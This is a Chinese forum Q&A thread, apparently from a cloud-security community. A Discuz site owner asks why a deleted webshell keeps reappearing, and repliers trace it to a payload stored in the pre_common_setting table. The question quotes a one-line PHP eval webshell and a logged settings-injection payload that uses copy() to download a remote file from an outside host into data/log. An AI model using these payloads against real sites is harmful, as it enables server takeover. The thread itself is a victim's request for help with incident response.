我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
2016-07-16 16:16:13
月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马,在discuz论坛的 data/log 目录中,其中一个叫mc5.php文件内的代码为
\"%><?php eval($_POST[ob]);?><%' 我上百度查了下是可以执行任何php程式的木马,另一个php文件代码很多,好像是用来脱库的,于是我立刻删掉了这两个文件。
然后我在discuz后台发现有人盗用了管理员的密码!并在后台执行了以下两行代码(在后台的管理记录中查看到的),两行代码执行的位置都在后台的域名设置中,视乎是利用后台的域名设置选项中的漏洞上传的这个后门! 我当时立刻修改了管理员密码,想说是不是堵住了漏洞!
但是今天我又收到阿里云的检查到同样的webshell木马,就是那个mc5.php,我上服务器删掉文件,但是立即又生成一个,我去查看discuz的后台管理记录,发现并没有其他人登陆过后台,现在不知道黑客是利用的什么来上传的文件?是不是因为之前管理员密码被盗执行的那两行代码没有得到修复? 我想知道如果购买了安骑士专业版,是可以找出并堵住漏洞还是只能够查出木马然后屏蔽? 如果只是屏蔽不能堵住漏洞的话,跟我现在手动删掉就没啥区别!
\"%><?php eval($_POST[ob]);?><%' 我上百度查了下是可以执行任何php程式的木马,另一个php文件代码很多,好像是用来脱库的,于是我立刻删掉了这两个文件。
然后我在discuz后台发现有人盗用了管理员的密码!并在后台执行了以下两行代码(在后台的管理记录中查看到的),两行代码执行的位置都在后台的域名设置中,视乎是利用后台的域名设置选项中的漏洞上传的这个后门! 我当时立刻修改了管理员密码,想说是不是堵住了漏洞!
GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };
GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };
但是今天我又收到阿里云的检查到同样的webshell木马,就是那个mc5.php,我上服务器删掉文件,但是立即又生成一个,我去查看discuz的后台管理记录,发现并没有其他人登陆过后台,现在不知道黑客是利用的什么来上传的文件?是不是因为之前管理员密码被盗执行的那两行代码没有得到修复? 我想知道如果购买了安骑士专业版,是可以找出并堵住漏洞还是只能够查出木马然后屏蔽? 如果只是屏蔽不能堵住漏洞的话,跟我现在手动删掉就没啥区别!
取消
提交回答
全部回答(2)
-
dageda2016-07-25 10:01:07Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?这种情况你可以先把discuz后台密码修改为强密码,防止再被黑客进入后台
这种漏洞安骑士现在暂时没法修复的,关键在这行代码
你可以在本地写一个测试脚本
这行代码相当于web的后门,PHP在解析到这段payload的时候,会立刻自动执行并不返回结果,所以你一开始即使修改了密码,黑客只要访问到和maxsmilies有关的页面时,webshell又会自动生成
0 0 -
厂长2016-07-16 21:21:20Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?自己摸索着解决了,原来是被写入了数据库自动下载那个后门文件!在pre_common_setting这个表里找到相关字段删除即可!希望可以帮到遇到此问题并像我一样的菜鸟!0 0
添加回答
云安全开发者的大本营
推荐文章
相似问题
推荐课程
-
Spring Security知识精讲与实战演示(四)
学习人数:37
-
Spring Security知识精讲与实战演示(三)
学习人数:21
-
Spring Security知识精讲与实战演示(二)
学习人数:14